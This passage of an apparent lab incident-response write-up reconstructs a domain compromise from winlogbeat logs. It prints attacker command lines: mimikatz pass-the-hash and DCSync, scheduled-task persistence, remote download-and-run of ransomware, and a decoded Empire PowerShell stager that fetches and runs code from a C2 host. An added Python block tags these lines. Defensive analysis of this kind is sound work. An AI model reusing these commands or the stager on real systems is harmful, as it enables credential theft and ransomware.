It seems that allan.smith is a local administrator on the workstation, and the attacker leveraged this by dumping credentials via a downloaded mimikatz.exe, this time revealing the NTLM hash of the Domain Administrator, Administrator:
$ curl -d "$(cat query.json)" -H 'Content-Type: application/json' -s http://elastic:elastic@10.10.241.17:9200/winlogbeat-7.17.6-2023.08.29-000001/_search?size=3000 | jq -c '.hits.hits[]."_source"' | grep command_line | jq -r '"\(."@timestamp") \(.user.name)\t\(.process.pid)\t\(.process.parent.pid)\t\(.process.command_line)"' | sort | grep 6708
[..omitted..]
2023-08-30T00:22:15.913Z allan.smith 5128 6708 "C:\Windows\system32\cmd.exe" /c hostname
2023-08-30T00:22:22.315Z allan.smith 5096 6708 "C:\Windows\system32\cmd.exe" /c "whoami /all"
2023-08-30T01:28:22.638Z allan.smith 6612 6708 "C:\Windows\system32\more.com"
2023-08-30T01:29:09.409Z allan.smith 1812 6708 "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "iwr https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20220919/mimikatz_trunk.zip -outfile mimi.zip"
2023-08-30T01:29:39.620Z allan.smith 6528 6708 "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "Expand-Archive mimi.zip"
2023-08-30T01:30:25.545Z allan.smith 2056 6708 "C:\Users\allan.smith\Documents\mimi\x64\mimikatz.exe" "sekurlsa::pth /user:itadmin /domain:QUICKLOGISTICS /ntlm:F84769D250EB95EB2D7D8B4A1C5613F2 /run:powershell.exe" exit
2023-08-30T01:30:51.647Z allan.smith 6736 6708 "C:\Users\allan.smith\Documents\mimi\x64\mimikatz.exe" privilege::debug sekurlsa::logonpasswords exit
2023-08-30T01:31:39.366Z allan.smith 6236 6708 "C:\Users\allan.smith\Documents\mimi\x64\mimikatz.exe" "sekurlsa::pth /user:administrator /domain:QUICKLOGISTICS /ntlm:00f80f2538dcb54e7adc715c0e7091ec /run:powershell.exe" exit
[..omitted..]
The Empire stager was run again, then the attacker used Invoke-Command once again to execute commands remotely on DC01, as well as establishing persistence via schtasks.exe on WKSTN-1327:
$ curl -d "$(cat query.json)" -H 'Content-Type: application/json' -s http://elastic:elastic@10.10.241.17:9200/winlogbeat-7.17.6-2023.08.29-000001/_search?size=3000 | jq -c '.hits.hits[]."_source"' | grep command_line | jq -r '"\(."@timestamp") \(.user.name)\t\(.process.pid)\t\(.process.parent.pid)\t\(.process.command_line)"' | sort | grep 2780
2023-08-30T01:40:38.541Z allan.smith 2780 752 C:\Windows\system32\wsmprovhost.exe -Embedding
2023-08-30T01:40:38.808Z allan.smith 6320 2780 "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc 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
$ curl -d "$(cat query.json)" -H 'Content-Type: application/json' -s http://elastic:elastic@10.10.241.17:9200/winlogbeat-7.17.6-2023.08.29-000001/_search?size=3000 | jq -c '.hits.hits[]."_source"' | grep command_line | jq -r '"\(."@timestamp") \(.user.name)\t\(.process.pid)\t\(.process.parent.pid)\t\(.process.command_line)"' | sort | grep 6320
2023-08-30T01:40:38.808Z allan.smith 6320 2780 "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc 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
2023-08-30T01:41:34.991Z allan.smith 5756 6320 "C:\Users\allan.smith\Documents\mimi\x64\mimikatz.exe" "sekurlsa::pth /user:administrator /domain:quicklogistics.org /ntlm:00f80f2538dcb54e7adc715c0e7091ec /run:powershell.exe" exit
2023-08-30T01:42:47.600Z allan.smith 4276 6320 "C:\Windows\system32\schtasks.exe" /Create /F /RU system /SC ONIDLE /I 2 /TN Updater /TR "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NonI -W hidden -c \"IEX ([Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String((gp HKLM:\Software\Microsoft\Network debug).debug)))\""
2023-08-30T01:43:36.715Z allan.smith 4464 6320 "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "Invoke-Command -ScriptBlock {hostname} -ComputerName DC01.quicklogistics.org"
2023-08-30T01:43:45.614Z allan.smith 3100 6320 "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "Invoke-Command -ScriptBlock {hostname}"
2023-08-30T01:43:57.673Z allan.smith 5096 6320 "C:\Users\allan.smith\Documents\mimi\x64\mimikatz.exe" "sekurlsa::pth /user:administrator /domain:quicklogistics.org /ntlm:00f80f2538dcb54e7adc715c0e7091ec /run:powershell.exe" exit
2023-08-30T01:45:12.695Z allan.smith 5156 6320 "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "Invoke-Command -ScriptBlock {hostname} -ComputerName DC01.quicklogistics.org"
Confirming the remote executions on DC01 via Invoke-Command, everything went through, including an Empire stager:
$ curl -d "$(cat query.json)" -H 'Content-Type: application/json' -s http://elastic:elastic@10.10.81.59:9200/winlogbeat-7.17.6-2023.08.29-000001/_search?size=3000 | jq -c '.hits.hits[]."_source"' | grep command_line | jq -r '"\(."@timestamp") \(.user.name)@\(.host.hostname)\t\(.process.pid)\t\(.process.parent.pid)\t\(.process.command_line)"' | sort | grep DC01
2023-08-29T23:50:11.566Z Administrator@DC01 2656 5944 "C:\Windows\system32\sc.exe" start winlogbeat
2023-08-30T01:45:02.538Z Administrator@DC01 6644 1000 C:\Windows\system32\wsmprovhost.exe -Embedding
2023-08-30T01:45:03.836Z Administrator@DC01 2556 6644 "C:\Windows\system32\HOSTNAME.EXE"
2023-08-30T01:45:19.418Z Administrator@DC01 7152 1000 C:\Windows\system32\wsmprovhost.exe -Embedding
2023-08-30T01:45:19.629Z Administrator@DC01 6212 7152 "C:\Windows\system32\HOSTNAME.EXE"
2023-08-30T01:45:41.086Z Administrator@DC01 5292 1000 C:\Windows\system32\wsmprovhost.exe -Embedding
2023-08-30T01:45:41.297Z Administrator@DC01 4008 5292 "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc 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
$ echo "SQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAAMwApAHsAfQA7AFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoARQB4AHAAZQBjAHQAMQAwADAAQwBvAG4AdABpAG4AdQBlAD0AMAA7ACQAdwBjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAdQA9ACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAVAByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwAkAHMAZQByAD0AJAAoAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBqAEEARwBRAEEAYgBnAEEAdQBBAEcASQBBAFkAUQBCAHUAQQBHAEUAQQBiAGcAQgBoAEEASABBAEEAWgBRAEIAbABBAEcAdwBBAGMAQQBCAGgAQQBIAEkAQQBkAEEAQgA1AEEAQwA0AEEAYgBnAEIAbABBAEgAUQBBAE8AZwBBADQAQQBEAEEAQQAnACkAKQApADsAJAB0AD0AJwAvAGEAZABtAGkAbgAvAGcAZQB0AC4AcABoAHAAJwA7ACQAdwBjAC4ASABlAGEAZABlAHIAcwAuAEEAZABkACgAJwBVAHMAZQByAC0AQQBnAGUAbgB0ACcALAAkAHUAKQA7ACQAdwBjAC4AUAByAG8AeAB5AD0AWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBEAGUAZgBhAHUAbAB0AFcAZQBiAFAAcgBvAHgAeQA7ACQAdwBjAC4AUAByAG8AeAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAQwBhAGMAaABlAF0AOgA6AEQAZQBmAGEAdQBsAHQATgBlAHQAdwBvAHIAawBDAHIAZQBkAGUAbgB0AGkAYQBsAHMAOwAkAFMAYwByAGkAcAB0ADoAUAByAG8AeAB5ACAAPQAgACQAdwBjAC4AUAByAG8AeAB5ADsAJABLAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAQgB5AHQAZQBzACgAJwB9AHcAUwAxACYAVgBOAHEAbwBJAFkAKgBHACMANQAtAFAAbAB2AHsAcAAyAGYAPQA0AFoAPwB1AGEAdABAADwAJwApADsAJABSAD0AewAkAEQALAAkAEsAPQAkAEEAcgBnAHMAOwAkAFMAPQAwAC4ALgAyADUANQA7ADAALgAuADIANQA1AHwAJQB7ACQASgA9ACgAJABKACsAJABTAFsAJABfAF0AKwAkAEsAWwAkAF8AJQAkAEsALgBDAG8AdQBuAHQAXQApACUAMgA1ADYAOwAkAFMAWwAkAF8AXQAsACQAUwBbACQASgBdAD0AJABTAFsAJABKAF0ALAAkAFMAWwAkAF8AXQB9ADsAJABEAHwAJQB7ACQASQA9ACgAJABJACsAMQApACUAMgA1ADYAOwAkAEgAPQAoACQASAArACQAUwBbACQASQBdACkAJQAyADUANgA7ACQAUwBbACQASQBdACwAJABTAFsAJABIAF0APQAkAFMAWwAkAEgAXQAsACQAUwBbACQASQBdADsAJABfAC0AYgB4AG8AcgAkAFMAWwAoACQAUwBbACQASQBdACsAJABTAFsAJABIAF0AKQAlADIANQA2AF0AfQB9ADsAJAB3AGMALgBIAGUAYQBkAGUAcgBzAC4AQQBkAGQAKAAiAEMAbwBvAGsAaQBlACIALAAiAHIAbABrAEgAVgBYAFcAYgBiAD0AMQAzAGMAZgBjAG8AOQByAFUAWAB4ADAAaQA0AEoAMwB4AFQAdQA2ADgAMgBKAEYAaQBYADAAPQAiACkAOwAkAGQAYQB0AGEAPQAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAJABzAGUAcgArACQAdAApADsAJABpAHYAPQAkAGQAYQB0AGEAWwAwAC4ALgAzAF0AOwAkAGQAYQB0AGEAPQAkAGQAYQB0AGEAWwA0AC4ALgAkAGQAYQB0AGEALgBsAGUAbgBnAHQAaABdADsALQBqAG8AaQBuAFsAQwBoAGEAcgBbAF0AXQAoACYAIAAkAFIAIAAkAGQAYQB0AGEAIAAoACQASQBWACsAJABLACkAKQB8AEkARQBYAA==" | base64 -d
If($PSVersionTable.PSVersion.Major -ge 3){};[System.Net.ServicePointManager]::Expect100Continue=0;$wc=New-Object System.Net.WebClient;$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';$ser=$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('aAB0AHQAcAA6AC8ALwBjAGQAbgAuAGIAYQBuAGEAbgBhAHAAZQBlAGwAcABhAHIAdAB5AC4AbgBlAHQAOgA4ADAA')));$t='/admin/get.php';$wc.Headers.Add('User-Agent',$u);$wc.Proxy=[System.Net.WebRequest]::DefaultWebProxy;$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;$Script:Proxy = $wc.Proxy;$K=[System.Text.Encoding]::ASCII.GetBytes('}wS1&VNqoIY*G#5-Plv{p2f=4Z?uat@<');$R={$D,$K=$Args;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.Count])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-bxor$S[($S[$I]+$S[$H])%256]}};$wc.Headers.Add("Cookie","rlkHVXWbb=13cfco9rUXx0i4J3xTu682JFiX0=");$data=$wc.DownloadData($ser+$t);$iv=$data[0..3];$data=$data[4..$data.length];-join[Char[]](& $R $data ($IV+$K))|IEX
$ echo "aAB0AHQAcAA6AC8ALwBjAGQAbgAuAGIAYQBuAGEAbgBhAHAAZQBlAGwAcABhAHIAdAB5AC4AbgBlAHQAOgA4ADAA" | base64 -d
http://cdn.bananapeelparty.net:80
The attacker performed a DCSync attack via mimikatz.exe against another Domain Administrator, backupda:
$ curl -d "$(cat query.json)" -H 'Content-Type: application/json' -s http://elastic:elastic@10.10.81.59:9200/winlogbeat-7.17.6-2023.08.29-000001/_search?size=3000 | jq -c '.hits.hits[]."_source"' | grep command_line | jq -r '"\(."@timestamp") \(.user.name)@\(.host.hostname)\t\(.process.pid)\t\(.process.parent.pid)\t\(.process.command_line)"' | sort | grep DC01 | grep 4008
2023-08-30T01:46:18.577Z Administrator@DC01 5936 4008 "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "iwr https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20220919/mimikatz_trunk.zip -outfile mimi.zip"
2023-08-30T01:46:32.376Z Administrator@DC01 4164 4008 "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "Expand-Archive mimi.zip"
2023-08-30T01:47:34.171Z Administrator@DC01 4980 4008 "C:\Windows\system32\net.exe" localgroup administrators
2023-08-30T01:47:57.809Z Administrator@DC01 6800 4008 "C:\Users\Administrator\Documents\mimi\x64\mimikatz.exe" "lsadump::dcsync /domain:quicklogistics.org /user:backupda" exit
2023-08-30T01:48:04.117Z Administrator@DC01 2560 4008 "C:\Users\Administrator\Documents\mimi\x64\mimikatz.exe" "lsadump::dcsync /domain:quicklogistics.org /user:administrator" exit
A callback to the Empire C2 was then established using the Domain Administrator account on both WKSTN-0051 and WKSTN-1327:
$ curl -d "$(cat query.json)" -H 'Content-Type: application/json' -s http://elastic:elastic@10.10.81.59:9200/winlogbeat-7.17.6-2023.08.29-000001/_search?size=3000 | jq -c '.hits.hits[]."_source"' | grep command_line | jq -r '"\(."@timestamp") \(.user.name)@\(.host.hostname)\t\(.process.pid)\t\(.process.parent.pid)\t\(.process.command_line)"' | sort | grep WKSTN-0051
2023-08-30T02:06:09.872Z Administrator@WKSTN-0051 8324 5004 "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "Invoke-Command -ComputerName WKSTN-0051.quicklogistics.org -ScriptBlock {powershell -enc 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}"
2023-08-30T02:06:25.390Z Administrator@WKSTN-0051 2340 5004 "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "Invoke-Command -ComputerName WKSTN-1327.quicklogistics.org -ScriptBlock {powershell -enc SQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAAMwApAHsAfQA7AFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoARQB4AHAAZQBjAHQAMQAwADAAQwBvAG4AdABpAG4AdQBlAD0AMAA7ACQAdwBjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAdQA9ACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAVAByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwAkAHMAZQByAD0AJAAoAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBqAEEARwBRAEEAYgBnAEEAdQBBAEcASQBBAFkAUQBCAHUAQQBHAEUAQQBiAGcAQgBoAEEASABBAEEAWgBRAEIAbABBAEcAdwBBAGMAQQBCAGgAQQBIAEkAQQBkAEEAQgA1AEEAQwA0AEEAYgBnAEIAbABBAEgAUQBBAE8AZwBBADQAQQBEAEEAQQAnACkAKQApADsAJAB0AD0AJwAvAGEAZABtAGkAbgAvAGcAZQB0AC4AcABoAHAAJwA7ACQAdwBjAC4ASABlAGEAZABlAHIAcwAuAEEAZABkACgAJwBVAHMAZQByAC0AQQBnAGUAbgB0ACcALAAkAHUAKQA7ACQAdwBjAC4AUAByAG8AeAB5AD0AWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBEAGUAZgBhAHUAbAB0AFcAZQBiAFAAcgBvAHgAeQA7ACQAdwBjAC4AUAByAG8AeAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAQwBhAGMAaABlAF0AOgA6AEQAZQBmAGEAdQBsAHQATgBlAHQAdwBvAHIAawBDAHIAZQBkAGUAbgB0AGkAYQBsAHMAOwAkAFMAYwByAGkAcAB0ADoAUAByAG8AeAB5ACAAPQAgACQAdwBjAC4AUAByAG8AeAB5ADsAJABLAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAQgB5AHQAZQBzACgAJwB9AHcAUwAxACYAVgBOAHEAbwBJAFkAKgBHACMANQAtAFAAbAB2AHsAcAAyAGYAPQA0AFoAPwB1AGEAdABAADwAJwApADsAJABSAD0AewAkAEQALAAkAEsAPQA
kAEEAcgBnAHMAOwAkAFMAPQAwAC4ALgAyADUANQA7ADAALgAuADIANQA1AHwAJQB7ACQASgA9ACgAJABKACsAJABTAFsAJABfAF0AKwAkAEsAWwAkAF8AJQAkAEsALgBDAG8AdQBuAHQAXQApACUAMgA1ADYAOwAkAFMAWwAkAF8AXQAsACQAUwBbACQASgBdAD0AJABTAFsAJABKAF0ALAAkAFMAWwAkAF8AXQB9ADsAJABEAHwAJQB7ACQASQA9ACgAJABJACsAMQApACUAMgA1ADYAOwAkAEgAPQAoACQASAArACQAUwBbACQASQBdACkAJQAyADUANgA7ACQAUwBbACQASQBdACwAJABTAFsAJABIAF0APQAkAFMAWwAkAEgAXQAsACQAUwBbACQASQBdADsAJABfAC0AYgB4AG8AcgAkAFMAWwAoACQAUwBbACQASQBdACsAJABTAFsAJABIAF0AKQAlADIANQA2AF0AfQB9ADsAJAB3AGMALgBIAGUAYQBkAGUAcgBzAC4AQQBkAGQAKAAiAEMAbwBvAGsAaQBlACIALAAiAHIAbABrAEgAVgBYAFcAYgBiAD0AMQAzAGMAZgBjAG8AOQByAFUAWAB4ADAAaQA0AEoAMwB4AFQAdQA2ADgAMgBKAEYAaQBYADAAPQAiACkAOwAkAGQAYQB0AGEAPQAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAJABzAGUAcgArACQAdAApADsAJABpAHYAPQAkAGQAYQB0AGEAWwAwAC4ALgAzAF0AOwAkAGQAYQB0AGEAPQAkAGQAYQB0AGEAWwA0AC4ALgAkAGQAYQB0AGEALgBsAGUAbgBnAHQAaABdADsALQBqAG8AaQBuAFsAQwBoAGEAcgBbAF0AXQAoACYAIAAkAFIAIAAkAGQAYQB0AGEAIAAoACQASQBWACsAJABLACkAKQB8AEkARQBYAA==}"
After gaining full control of the QUICKLOGISTICS.ORG domain, the attacker downloaded and executed a suspicious file, ransomboogey.exe, on DC01 as well as on WKSTN-1327. The ransomware was also downloaded on WKSTN-0051, but there were no signs of execution there:
$ curl -d "$(cat query.json)" -H 'Content-Type: application/json' -s http://elastic:elastic@10.10.81.59:9200/winlogbeat-7.17.6-2023.08.29-000001/_search?size=3000 | jq -c '.hits.hits[]."_source"' | grep command_line | jq -r '"\(."@timestamp") \(.user.name)@\(.host.hostname)\t\(.process.pid)\t\(.process.parent.pid)\t\(.process.command_line)"' | sort | grep DC01 | grep 4008
[..omitted..]
2023-08-30T01:53:13.738Z Administrator@DC01 4308 4008 "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "iwr http://ff.sillytechninja.io/ransomboogey.exe -outfile ransomboogey.exe"
2023-08-30T01:53:33.815Z Administrator@DC01 5572 4008 "C:\Users\Administrator\ransomboogey.exe"
2023-08-30T01:54:11.095Z Administrator@DC01 4404 4008 "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "Invoke-Command -ComputerName WKSTN-1327.quicklogistics.org -ScriptBlock {hostname}"
2023-08-30T01:54:24.982Z Administrator@DC01 6808 4008 "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "Invoke-Command -ComputerName WKSTN-0051.quicklogistics.org -ScriptBlock {hostname}"
2023-08-30T01:56:05.018Z Administrator@DC01 4296 4008 "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "Invoke-Command -ComputerName WKSTN-1327.quicklogistics.org -ScriptBlock {iwr http://ff.sillytechninja.io/ransomboogey.exe -outfile ransomboogey.exe; .\ransomboogey.exe}"
2023-08-30T01:56:40.186Z Administrator@DC01 6436 4008 "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "Invoke-Command -ComputerName WKSTN-1327.quicklogistics.org -ScriptBlock {iwr http://ff.sillytechninja.io/ransomboogey.exe -outfile C:\Users\itadmin\ransomboogey.exe; C:\Users\itadmin\ransomboogey.exe}"
2023-08-30T01:57:53.649Z Administrator@DC01 5984 4008 "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "Invoke-Command -ComputerName WKSTN-1327.quicklogistics.org -ScriptBlock {C:\Users\itadmin\ransomboogey.exe}"
2023-08-30T01:59:36.244Z Administrator@DC01 5148 4008 "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "Invoke-Command -ComputerName WKSTN-0051.quicklogistics.org -ScriptBlock {iwr http://ff.sillytechninja.io/ransomboogey.exe -outfile C:\Users\itadmin\ransomboogey.exe;}"
2023-08-30T02:00:58.090Z Administrator@DC01 3672 4008 "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "Invoke-Command -ComputerName WKSTN-0051.quicklogistics.org -ScriptBlock {hostname}"
2023-08-30T02:01:14.244Z Administrator@DC01 4384 4008 "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "Invoke-Command -ComputerName WKSTN-0051.quicklogistics.org -ScriptBlock {iwr http://ff.sillytechninja.io/ransomboogey.exe -outfile C:\Users\evan.hutchinson\ransomboogey.exe;}"
[..omitted..]
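The hunts above pull one parent PID or one host out of the flattened winlogbeat records and leave the analyst to read each command line. The Python below, an added example that is not part of the original write-up, does the same over a few constructed `_source` documents and tags every command line with the behaviour it shows (DCSync, remote execution, download-to-disk, encoded PowerShell, and what a decoded `-enc` payload actually does). The encoded script block, the `c2.invalid` URL and the helper names are assumptions, not values captured in the room.

```python
import base64
import re

# Constructed winlogbeat-style "_source" documents, shaped like the ones the page's curl|jq
# pipeline flattens. The encoded script block is a constructed stand-in, not the captured stager.
PS = '"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"'
STAGER = "$wc=New-Object System.Net.WebClient;IEX $wc.DownloadString('http://c2.invalid/get.php')"
ENC = base64.b64encode(STAGER.encode("utf-16-le")).decode()  # how `powershell -enc` expects it

def ev(ts, user, host, pid, ppid, cmd):
    return {"@timestamp": ts, "user": {"name": user}, "host": {"hostname": host},
            "process": {"pid": pid, "parent": {"pid": ppid}, "command_line": cmd}}

EVENTS = [
    ev("2023-08-30T01:47:57.809Z", "Administrator", "DC01", 6800, 4008,
       '"C:\\Users\\Administrator\\Documents\\mimi\\x64\\mimikatz.exe" "lsadump::dcsync /domain:quicklogistics.org /user:backupda" exit'),
    ev("2023-08-30T01:46:18.577Z", "Administrator", "DC01", 5936, 4008,
       PS + ' -c "iwr https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20220919/mimikatz_trunk.zip -outfile mimi.zip"'),
    ev("2023-08-30T01:56:05.018Z", "Administrator", "DC01", 4296, 4008,
       PS + ' -c "Invoke-Command -ComputerName WKSTN-1327.quicklogistics.org -ScriptBlock {iwr http://ff.sillytechninja.io/ransomboogey.exe -outfile ransomboogey.exe; .\\ransomboogey.exe}"'),
    ev("2023-08-30T02:06:25.390Z", "Administrator", "WKSTN-0051", 2340, 5004,
       PS + ' -c "Invoke-Command -ComputerName WKSTN-1327.quicklogistics.org -ScriptBlock {powershell -enc ' + ENC + '}"'),
    ev("2023-08-30T02:04:59.635Z", "itadmin", "WKSTN-1327", 7300, 7264, "C:\\Windows\\Explorer.EXE"),
]

def decode_enc(cmd):
    """Return the UTF-16LE script hidden behind `-enc <base64>`, or '' if the line has none."""
    m = re.search(r"-enc(?:odedcommand)?\s+([A-Za-z0-9+/=]+)", cmd, re.I)
    return base64.b64decode(m.group(1)).decode("utf-16-le") if m else ""

# One pattern per behaviour seen in this intrusion. The decoded payload is inspected as well,
# so an encoded stager is tagged by what it does, not only by the fact that it is encoded.
CHECKS = {
    "dcsync": r"lsadump::dcsync",
    "remote_exec": r"Invoke-Command\s+-ComputerName",
    "download": r"\biwr\b.*-outfile",
    "encoded_ps": r"-enc(odedcommand)?\s",
    "stager": r"\bIEX\b|Invoke-Expression|DownloadString|DownloadData",
    "ransomboogey": r"ransomboogey\.exe",
}

def classify(cmd):
    text = cmd + " " + decode_enc(cmd)
    return sorted(tag for tag, rx in CHECKS.items() if re.search(rx, text, re.I))

def timeline(events, host=None, ppid=None):
    """Sorted (timestamp, user@host, pid, ppid, tags) rows, filtered like `grep DC01 | grep 4008`."""
    rows = []
    for e in events:
        p = e["process"]
        if (host and e["host"]["hostname"] != host) or (ppid and p["parent"]["pid"] != ppid):
            continue
        rows.append((e["@timestamp"], f'{e["user"]["name"]}@{e["host"]["hostname"]}',
                     p["pid"], p["parent"]["pid"], classify(p["command_line"])))
    return sorted(rows)
```

Feeding the real `_source` objects from the page's query into `timeline(..., host="DC01", ppid=4008)` reproduces the children of the Empire agent process in order, with each row already labelled.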
An execution of ransomboogey.exe by itadmin could also be seen on WKSTN-1327:
$ curl -d "$(cat query.json)" -H 'Content-Type: application/json' -s http://elastic:elastic@10.10.81.59:9200/winlogbeat-7.17.6-2023.08.29-000001/_search?size=3000 | jq -c '.hits.hits[]."_source"' | grep command_line | jq -r '"\(."@timestamp") \(.user.name)@\(.host.hostname)\t\(.process.pid)\t\(.process.parent.pid)\t\(.process.command_line)"' | sort | grep 7300
[..omitted..]
2023-08-30T02:04:59.635Z itadmin@WKSTN-1327 7300 7264 C:\Windows\Explorer.EXE
[..omitted..]
2023-08-30T02:07:22.741Z itadmin@WKSTN-1327 8804 7300 "C:\Users\itadmin\ransomboogey.exe"
[..omitted..]
TIMESTAMP | EVENT |
---|---|